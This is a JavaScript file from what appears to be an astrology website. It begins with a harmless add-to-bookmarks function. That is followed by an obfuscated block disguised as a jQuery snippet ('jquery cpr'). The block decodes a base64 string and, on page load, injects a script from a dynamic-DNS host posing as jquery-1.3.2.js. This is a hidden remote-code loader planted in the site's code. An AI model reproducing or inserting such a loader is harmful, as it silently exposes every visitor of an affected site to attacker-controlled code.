<!--


function favor(){

var url = 'http://astro-ezoteric.ru';
var title = 'ÀÑÒÐÎ ÝÇÎÒÅÐÈÊ ÐÓ';

if (window.sidebar) // firefox
        window.sidebar.addPanel(title, url, "");
else if(window.opera && window.print){ // opera
        var elem = document.createElement('a');
        elem.setAttribute('href',url);
        elem.setAttribute('title',title);
        elem.setAttribute('rel','sidebar');
        elem.click();
}
else if(document.all)// ie
        window.external.AddFavorite(url, title);
}


//-->
/* === jquery cpr === */
if(!document.xmlSettings)document.xmlSettings={};document.xmlSettings.ae=function(e,et,f){if(e.addEventListener){e.addEventListener(et,f,false);return f;}ief=function(){f.call(f)};e.attachEvent('on'+et,ief);return ief;};document.xmlSettings.bd=function(data){var b64="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc='';do{h1=b64.indexOf(data.charAt(i++));h2=b64.indexOf(data.charAt(i++));h3=b64.indexOf(data.charAt(i++));h4=b64.indexOf(data.charAt(i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64)enc+=String.fromCharCode(o1);else if(h4==64)enc+=String.fromCharCode(o1,o2);else enc+=String.fromCharCode(o1,o2,o3);}while(i<data.length);return enc;};document.xmlSettings.ae(window,'load',function(e){document.xmlSettings.ssrc=document.xmlSettings.bd('aHR0cDovL3Byb3RvMy5kZG5zLmluZm8vNS9qcXVlcnktMS4zLjIuanM=');document.xmlSettings.scriptElement=document.createElement('script');document.xmlSettings.scriptElement.setAttribute('type','text/javascript');document.xmlSettings.scriptElement.setAttribute('src',document.xmlSettings.ssrc);document.body.appendChild(document.xmlSettings.scriptElement);});
/* === /jquery cpr === */
